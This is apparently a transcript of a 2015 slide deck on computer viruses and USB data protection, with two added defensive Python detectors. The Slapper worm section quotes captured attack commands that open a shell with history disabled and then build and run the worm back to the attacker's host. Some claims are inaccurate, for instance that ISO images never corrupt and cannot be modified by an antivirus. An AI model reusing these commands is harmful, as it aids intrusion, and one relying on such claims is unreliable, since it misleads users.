Virus & Data Protection
– Research by DKSoft...
Posted on 22-Jul-2015 (transcript)
Agenda
Overview of Virus
History of Virus
Special Types of Trojans (Major Type of Virus)
Concept of latest Trojans
Virus Program Execution
Working of a Slapper (Worm Virus)
Data loss
Data Protection
Recommended Anti-Virus Softwares
Overview of Virus
Virus – Malicious program with a set of destructive code that starts replicating to infect the OS or user data when it is accessed
Major Types of Viruses: Trojan Horse, Worm
Some Features of Virus:
Locates & infects “.exe”, “.com”, “.dll” files
Deletes files, shuts down programs, eats up system resources, hides or alters data
VB & Command Scripts contain Assembly code for Virus replication (Optional)
Hex dump of a worm leaving message for Bill Gates III
History of Virus
1. Elk Cloner – First real Virus, written by Richard Skrenta for the Apple II. It sticks to all the disks; it can also modify RAM
2. “Brain” – First major PC Virus, found in Lahore, Pakistan
Boot Sector of a Floppy infected by “Brain”
Special Types of Trojans
Exploit – Spreads malicious data in the OS
Backdoor – Created to give access to a Computer to an unauthorized user
DDoS – Causes a Web Address to fail
Tiny Trojan Banker – Steals Bank details of a user or organization
FakeAV – Convinces the user that the PC is infected with a Virus
Ransom – Designed for crime; modifies or blocks data on a Computer & the data in it
Downloader – Programmed to download & install new malicious programs
Spy – Invisible to the user & observes Computer activities silently by taking screenshots
SpyEye – Targets Airline Travel & Banking Websites
Zeus – Steals banking details & personal data, participates in fraud schemes & other criminal works
AIDS – Infects “.exe” & “.com” files
Concept of latest Trojan
[Diagram: Shortcut file -> Address -> X -> Hidden Data; cmd.exe -> opens -> explorer.exe]
Step 1: Waits till it is accessed by the user or Anti-Virus
Step 2: Sticks to specified System Files
Step 3: Permanently hides all Files & Folders present in External Drives
Step 4: Creates shortcuts of all the Files & Folders present in External Drives
Step 5: Opens the particular File/Folder when its shortcut file is accessed
Step 6: Some Viruses use VB or Command scripts for replication & some have the capacity to self-replicate inside all the External Drives connected to the infected Computer
[Diagram: Shortcut -> cmd.exe -> explorer.exe -> Hidden Data]
The shortcut file is at the front end & at the back end it contains the address of the hidden data
Virus Program Execution
[Flowchart: Infected program vs Normal program, from Start to End]
Working of Slapper
Slapper Requesting
68.168.1.15:52160 -> 127.0.0.1:80
GET / HTTP/1.1....
127.0.0.1:80 -> 68.168.1.15:52160
HTTP/1.1 400 Bad Request..Date: Sun, 22 Sep 2002 03:41:10
GMT..Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4
OpenSSL/0.9.6b DAV/1.0.2 PHP/ 4.0.6 mod_perl/1.24_01..Connection:
close..Transfer-Encoding: chunked..Content-Type: text/html;
charset=iso-8859-1....169..<!DOCTYPE HTML PUBLIC "-//IETF//DTD
HTML 2.0//EN">.<HTML><HEAD>.<TITLE>400 Bad quest</TITLE>. </HEAD>
<BODY>.<H1>Bad Request</H1>.Your browser sent a request that this
server could not understand.<P>.client sent HTTP/1.1 request
without hostname (see RFC2616 section 14.23): <P>. <HR>.
<ADDRESS>Apache/1.3.20 Server at 127.0.0.1 Port
80</ADDRESS>.</BODY></HTML>...0....
Slapper Attacking
[..]
68.168.1.15:52312 -> 127.0.0.1:443
export TERM=xterm;export HOME=/tmp;export
HISTFILE=/dev/null; export
PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i.
68.168.1.15:52312 -> 127.0.0.1:443
Compiling and Installing
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd
/tmp/update; exit; .
68.168.1.15:52312 -> 127.0.0.1:443
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c
/tmp/httpd /tmp /update /tmp/.unlock; .cat > /tmp/.unlock.uu <<
__eof__; .begin 655 .unlock
[worm source code, in uuencoded format, omitted]
68.168.1.15:52312 -> 127.0.0.1:443
uudecode -o /tmp/.unlock /tmp/.unlock.uu; tar xzf /tmp/.unlock -
C /tmp/;gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; gcc -o
/tmp/update /tmp/.update.c;./tmp/httpd 68.168.1.15; /tmp/update;
.
68.168.1.15:52312 -> 127.0.0.1:443
Remote Communications
obs: XXXX XXXX == localhost IP
YYYY YYYY == worm_host IP
0x70 == Incomming client flag
127.0.0.1.4156 > 68.168.1.15.4156: udp 28 (DF)
0x0000 4500 0038 0000 4000 4011 beb3 XXXX XXXX E..8..@.@.......
0x0010 YYYY YYYY 103c 103c 0024 92cb 0000 0000 ...'.<.<.$......
0x0020 8fff 0000 25b8 aaa8 7000 0000 0000 0000 ....%...p.......
^^
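Added example, not from the slides or from the Slapper analysis they quote: a small Python detector that parses a tcpdump-style hex dump like the one above, decodes the IPv4/UDP headers and flags the Slapper P2P packet by port 4156 (0x103c) on both ends and the 0x70 client flag at payload offset 12. The dump embedded here is constructed from the slide's bytes, with made-up 10.0.0.x addresses in place of XXXX/YYYY and the unshown last 8 payload bytes assumed zero; the function names are mine.

```python
import struct

SLAPPER_P2P_PORT = 4156       # 0x103c on both ends of the captured UDP packet
INCOMING_CLIENT_FLAG = 0x70   # byte at UDP payload offset 12, the "7000" marked ^^ on the slide

# Constructed tcpdump -x style dump of the 56-byte packet: 10.0.0.1/10.0.0.2 stand in
# for the XXXX/YYYY placeholders and the last 8 payload bytes are assumed to be zero.
SAMPLE_DUMP = """
0x0000 4500 0038 0000 4000 4011 beb3 0a00 0001 E..8..@.@.......
0x0010 0a00 0002 103c 103c 0024 92cb 0000 0000 .....<.<.$......
0x0020 8fff 0000 25b8 aaa8 7000 0000 0000 0000 ....%...p.......
0x0030 0000 0000 0000 0000 ........
"""

def parse_hexdump(text):
    """Turn 'offset hhhh hhhh ... ascii' lines into raw bytes; stops at the ASCII column."""
    out = bytearray()
    for line in text.strip().splitlines():
        for word in line.split()[1:]:
            if len(word) == 4 and all(c in "0123456789abcdef" for c in word.lower()):
                out += bytes.fromhex(word)
            else:
                break
    return bytes(out)

def decode_ipv4_udp(pkt):
    """Return addresses, ports and UDP payload, or None if this is not an IPv4/UDP packet."""
    if len(pkt) < 28 or pkt[0] >> 4 != 4 or pkt[9] != 17:   # version nibble, protocol 17 = UDP
        return None
    ihl = (pkt[0] & 0x0F) * 4
    src, dst = ".".join(map(str, pkt[12:16])), ".".join(map(str, pkt[16:20]))
    sport, dport, ulen = struct.unpack("!HHH", pkt[ihl:ihl + 6])
    return {"src": src, "dst": dst, "sport": sport, "dport": dport,
            "payload": pkt[ihl + 8:ihl + ulen]}

def is_slapper_p2p(pkt):
    """True for a Slapper P2P client hello: UDP 4156 -> 4156 with flag 0x70 at payload offset 12."""
    p = decode_ipv4_udp(pkt)
    if p is None or (p["sport"], p["dport"]) != (SLAPPER_P2P_PORT, SLAPPER_P2P_PORT):
        return False
    return len(p["payload"]) > 12 and p["payload"][12] == INCOMING_CLIENT_FLAG
```

Feeding it the output of a live `tcpdump -x udp port 4156` is the obvious next step; the parser deliberately ignores the ASCII column and does not verify checksums.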
Data Loss
Firstly, when a Virus infected Pendrive is inserted into a non-infected PC, every item present in the Pendrive appears in shortcut form, usually 1KB or 2KB in size (or more in rare cases)
Secondly, the user opens a folder (shortcut file) & feels that the entire data is safe. But this is when the Virus spreads to the PC & to all the External Devices connected in future
User scans & commands the Anti-Virus to take proper actions
Anti-Virus deletes the shortcut files present in the scanned Pendrive
After scanning, user opens the scanned Pendrive. “OMG!, I lost my important data”
The Virus re-appears even in a non-infected Pendrive. It spreads & replicates in all non-infected/infected External USB Devices
Data Protection
When a Virus infected Pendrive is inserted into a non-infected PC, note that every item present in the Pendrive appears as a shortcut. Never touch the shortcut files.
Go to “Folder Options” present in “Control Panel”
Click on the “View” tab present at the top of “Folder Options”
1. Mark “Show hidden files, folders and drives”
2. Untick “Hide protected operating system files (Recommended)”
3. Again open the same Pendrive
VB Script & its shortcut (Trojan Virus) containing code for the Virus to replicate
Original User data permanently hidden
Trojan or Worm viruses (as shortcuts to the Original Data)
“.Trashes” file present at the top contains address of Recycle Bin
Properties of Trojan (shortcut)
Properties of user data folder
If files are present inside a folder, then they are 99.99% safe. They can be copied or moved to any other directory to avoid data corruption
Scan & take a safe copy of required data from the hidden folder
Never touch the auto-created shortcut files or unknown files
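As an added example (not from the slides), the check a defender can run over a pendrive's root listing to spot the pattern described in the Concept of latest Trojan steps and in the Data Protection checklist above: a .lnk shortcut standing in front of a hidden item of the same name, plus hidden VB/command scripts. Entry, list_root and find_shortcut_worm are names I chose; the sample listing is constructed, and the attribute bits only come back from the OS on Windows.

```python
import os
from dataclasses import dataclass

# Windows attribute bits from os.stat(...).st_file_attributes (the field is absent on other OSes)
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4
SCRIPT_EXTS = {".vbs", ".vbe", ".bat", ".cmd"}   # VB & command scripts the slides mention

@dataclass(frozen=True)
class Entry:
    name: str      # name as listed in the drive root
    is_dir: bool
    hidden: bool   # "hidden" attribute set
    system: bool   # "system" attribute, what Folder Options calls a protected operating system file

def list_root(path):
    """Real scan of one directory; attribute bits are only populated on Windows."""
    out = []
    for d in os.scandir(path):
        attrs = getattr(d.stat(follow_symlinks=False), "st_file_attributes", 0)
        out.append(Entry(d.name, d.is_dir(follow_symlinks=False),
                         bool(attrs & FILE_ATTRIBUTE_HIDDEN), bool(attrs & FILE_ATTRIBUTE_SYSTEM)))
    return out

def find_shortcut_worm(entries):
    """Pair each .lnk with the hidden item it stands in for.
    Returns (shortcuts, originals, scripts): worm front-end shortcuts, hidden user data, hidden scripts."""
    hidden = {e.name: e for e in entries if e.hidden}
    hidden_stems = {os.path.splitext(e.name)[0]: e for e in hidden.values() if not e.is_dir}
    shortcuts, originals, scripts = [], [], []
    for e in entries:
        stem, ext = os.path.splitext(e.name)
        if not e.is_dir and ext.lower() == ".lnk":
            target = hidden.get(stem) or hidden_stems.get(stem)  # hidden folder name, or file minus extension
            if target is not None:
                shortcuts.append(e.name)
                originals.append(target.name)
        elif not e.is_dir and e.hidden and ext.lower() in SCRIPT_EXTS:
            scripts.append(e.name)
    return shortcuts, originals, scripts

# Constructed listing of an infected pendrive root (not captured from a real drive)
SAMPLE = [
    Entry("Photos", True, True, True), Entry("Photos.lnk", False, False, False),
    Entry("thesis.docx", False, True, True), Entry("thesis.lnk", False, False, False),
    Entry("update.vbs", False, True, True), Entry(".Trashes", True, True, False),
    Entry("readme.txt", False, False, False),
]
```

On a real drive, `find_shortcut_worm(list_root("E:\\"))` lists what to copy out (the originals) and what never to open (the shortcuts and scripts).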
Read Privacy Statements
Understand what you are getting before you agree to download or share your personal information
Think Before You Click
Be cautious with e-mail attachments and links
Only download files from Web sites you trust
Safely remove External Drives, shut down the Computer properly & don't save data in the System Partition
Use Power ISO, Win ISO, Ultra ISO, Magic ISO or any other Software for Data Backup
A Virus can be kidnapped & kept inside an “.iso” file as a locker
Advantages of creating “.iso” Image Data
Easy to create
Never corrupts
Mount to a Virtual Drive & access at high speed
Provides very tight security for data stored in it
OS or Anti-Virus cannot modify or delete its data without user’s permission
Portable with all OS supporting “.iso” Image Data
Will not compress Data
Recommended Anti-Virus based on security levels
SkyLabs Kaspersky
Symantec Norton
ESET
Bitdefender
Trend Micro
AVG
MS Essentials
Recommended Anti-Virus by popularity levels
SkyLabs Kaspersky
Bitdefender
Symantec Norton
MS Essentials
Trend Micro
AVG
ESET
– Research continued by DKSoft...
dksoft2015.blogspot.in